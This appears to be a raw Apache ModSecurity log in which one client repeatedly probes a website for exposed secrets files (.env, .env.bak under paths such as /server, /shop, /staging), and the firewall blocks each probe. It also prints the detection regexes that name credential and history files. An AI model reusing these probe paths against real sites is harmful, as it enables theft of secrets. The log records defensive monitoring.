[Tue May 26 14:50:05.475054 2026] [security2:error] [pid 648203:tid 648438] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0oQAAAO4"]
[Tue May 26 14:50:05.500181 2026] [security2:error] [pid 648203:tid 648407] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0pAAAAM8"]
[Tue May 26 14:50:05.556521 2026] [security2:error] [pid 648203:tid 648357] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0sAAAAJ0"]
[Tue May 26 14:50:05.594089 2026] [security2:error] [pid 648203:tid 648444] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0swAAAPQ"]
[Tue May 26 14:50:05.596829 2026] [security2:error] [pid 648203:tid 648355] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0fQAAAJs"]
[Tue May 26 14:50:05.614580 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0tgAAAKM"]
[Tue May 26 14:50:05.648265 2026] [security2:error] [pid 648203:tid 648417] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0uQAAANk"]
[Tue May 26 14:50:05.669988 2026] [security2:error] [pid 648203:tid 648396] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0vAAAAMQ"]
[Tue May 26 14:50:05.725297 2026] [security2:error] [pid 648203:tid 648382] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0wgAAALY"]
[Tue May 26 14:50:05.759329 2026] [security2:error] [pid 648203:tid 648388] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0xQAAALw"]
[Tue May 26 14:50:05.771557 2026] [security2:error] [pid 648203:tid 648448] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0yAAAAPg"]
[Tue May 26 14:50:05.878150 2026] [security2:error] [pid 648203:tid 648424] [client 45.148.10.95:31966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/server/.env"] [unique_id "ahVlxbEQDDtxJNiDrdT0zAAAAOA"]
[Tue May 26 14:50:05.891376 2026] [security2:error] [pid 648203:tid 648458] [client 45.148.10.95:31998] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/server/api/.env"] [unique_id "ahVlxbEQDDtxJNiDrdT0zQAAAQI"]
[Tue May 26 14:50:05.911320 2026] [security2:error] [pid 648203:tid 648408] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0ywAAANA"]
[Tue May 26 14:50:05.930561 2026] [security2:error] [pid 648203:tid 648419] [client 45.148.10.95:31870] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/s3/.env.bak"] [unique_id "ahVlxbEQDDtxJNiDrdT00gAAANs"]
[Tue May 26 14:50:05.965102 2026] [security2:error] [pid 648203:tid 648338] [client 45.148.10.95:31888] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/server/backend/.env"] [unique_id "ahVlxbEQDDtxJNiDrdT01gAAAIo"]
[Tue May 26 14:50:06.074879 2026] [security2:error] [pid 648203:tid 648348] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT02gAAAJQ"]
[Tue May 26 14:50:06.087071 2026] [security2:error] [pid 648203:tid 648354] [client 45.148.10.95:32056] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT02wAAAJo"]
[Tue May 26 14:50:06.099142 2026] [security2:error] [pid 648203:tid 648335] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlxbEQDDtxJNiDrdT0vwAAAIc"]
[Tue May 26 14:50:06.102395 2026] [security2:error] [pid 648203:tid 648420] [client 45.148.10.95:31998] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT03AAAANw"]
[Tue May 26 14:50:06.126692 2026] [security2:error] [pid 648203:tid 648392] [client 45.148.10.95:31832] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT03QAAAMA"]
[Tue May 26 14:50:06.128583 2026] [security2:error] [pid 648203:tid 648413] [client 45.148.10.95:32038] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT03gAAANU"]
[Tue May 26 14:50:06.144385 2026] [security2:error] [pid 648203:tid 648451] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT04gAAAPs"]
[Tue May 26 14:50:06.144611 2026] [security2:error] [pid 648203:tid 648397] [client 45.148.10.95:31870] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT03wAAAMU"]
[Tue May 26 14:50:06.165289 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:32040] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT04wAAAKk"]
[Tue May 26 14:50:06.233590 2026] [security2:error] [pid 648203:tid 648439] [client 45.148.10.95:31888] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT06QAAAO8"]
[Tue May 26 14:50:06.236451 2026] [security2:error] [pid 648203:tid 648446] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT06gAAAPY"]
[Tue May 26 14:50:06.250196 2026] [security2:error] [pid 648203:tid 648345] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT07AAAAJE"]
[Tue May 26 14:50:06.272832 2026] [security2:error] [pid 648203:tid 648355] [client 45.148.10.95:31832] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/service/.env"] [unique_id "ahVlxrEQDDtxJNiDrdT09QAAAJs"]
[Tue May 26 14:50:06.282304 2026] [security2:error] [pid 648203:tid 648371] [client 45.148.10.95:31966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/services/.env"] [unique_id "ahVlxrEQDDtxJNiDrdT09wAAAKs"]
[Tue May 26 14:50:06.297200 2026] [security2:error] [pid 648203:tid 648433] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT08AAAAOk"]
[Tue May 26 14:50:06.298074 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT08gAAAKY"]
[Tue May 26 14:50:06.331162 2026] [security2:error] [pid 648203:tid 648395] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT09gAAAMM"]
[Tue May 26 14:50:06.397369 2026] [security2:error] [pid 648203:tid 648339] [client 45.148.10.95:32034] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT0-gAAAIs"]
[Tue May 26 14:50:06.431402 2026] [security2:error] [pid 648203:tid 648422] [client 45.148.10.95:32040] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT0_QAAAN4"]
[Tue May 26 14:50:06.447547 2026] [security2:error] [pid 648203:tid 648373] [client 45.148.10.95:32056] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/shop/.env"] [unique_id "ahVlxrEQDDtxJNiDrdT1BwAAAK0"]
[Tue May 26 14:50:06.448505 2026] [security2:error] [pid 648203:tid 648411] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1AAAAANM"]
[Tue May 26 14:50:06.462908 2026] [security2:error] [pid 648203:tid 648423] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1AwAAAN8"]
[Tue May 26 14:50:06.487445 2026] [security2:error] [pid 648203:tid 648376] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1BgAAALA"]
[Tue May 26 14:50:06.555927 2026] [security2:error] [pid 648203:tid 648406] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1EAAAAM4"]
[Tue May 26 14:50:06.583160 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1FQAAAPA"]
[Tue May 26 14:50:06.618138 2026] [security2:error] [pid 648203:tid 648424] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1GQAAAOA"]
[Tue May 26 14:50:06.619505 2026] [security2:error] [pid 648203:tid 648404] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1HAAAAMw"]
[Tue May 26 14:50:06.647358 2026] [security2:error] [pid 648203:tid 648419] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1HwAAANs"]
[Tue May 26 14:50:06.745419 2026] [security2:error] [pid 648203:tid 648413] [client 45.148.10.95:31966] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1KgAAANU"]
[Tue May 26 14:50:06.755634 2026] [security2:error] [pid 648203:tid 648451] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1KwAAAPs"]
[Tue May 26 14:50:06.826925 2026] [security2:error] [pid 648203:tid 648407] [client 45.148.10.95:17002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1LAAAAM8"]
[Tue May 26 14:50:06.835898 2026] [security2:error] [pid 648203:tid 648350] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1LwAAAJY"]
[Tue May 26 14:50:06.839593 2026] [security2:error] [pid 648203:tid 648345] [client 45.148.10.95:32062] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/src/.env"] [unique_id "ahVlxrEQDDtxJNiDrdT1NAAAAJE"]
[Tue May 26 14:50:06.871995 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:32056] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1MAAAAKk"]
[Tue May 26 14:50:06.873313 2026] [security2:error] [pid 648203:tid 648439] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1MwAAAO8"]
[Tue May 26 14:50:06.904118 2026] [security2:error] [pid 648203:tid 648433] [client 45.148.10.95:32040] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/shared/.env"] [unique_id "ahVlxrEQDDtxJNiDrdT1NwAAAOk"]
[Tue May 26 14:50:06.949522 2026] [security2:error] [pid 648203:tid 648399] [client 45.148.10.95:32034] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1NQAAAMc"]
[Tue May 26 14:50:06.963840 2026] [security2:error] [pid 648203:tid 648436] [client 45.148.10.95:31966] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1NgAAAOw"]
[Tue May 26 14:50:06.972729 2026] [security2:error] [pid 648203:tid 648334] [client 45.148.10.95:17002] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/srv/.env"] [unique_id "ahVlxrEQDDtxJNiDrdT1PAAAAIY"]
[Tue May 26 14:50:06.988768 2026] [security2:error] [pid 648203:tid 648372] [client 45.148.10.95:31870] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/stage/.env"] [unique_id "ahVlxrEQDDtxJNiDrdT1PQAAAKw"]
[Tue May 26 14:50:07.022570 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:31998] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1OwAAAKM"]
[Tue May 26 14:50:07.025257 2026] [security2:error] [pid 648203:tid 648393] [client 45.148.10.95:32084] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/staging/.env"] [unique_id "ahVlx7EQDDtxJNiDrdT1PgAAAME"]
[Tue May 26 14:50:07.181805 2026] [security2:error] [pid 648203:tid 648377] [client 45.148.10.95:17002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1QwAAALE"]
[Tue May 26 14:50:07.189373 2026] [security2:error] [pid 648203:tid 648422] [client 45.148.10.95:32148] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1RgAAAN4"]
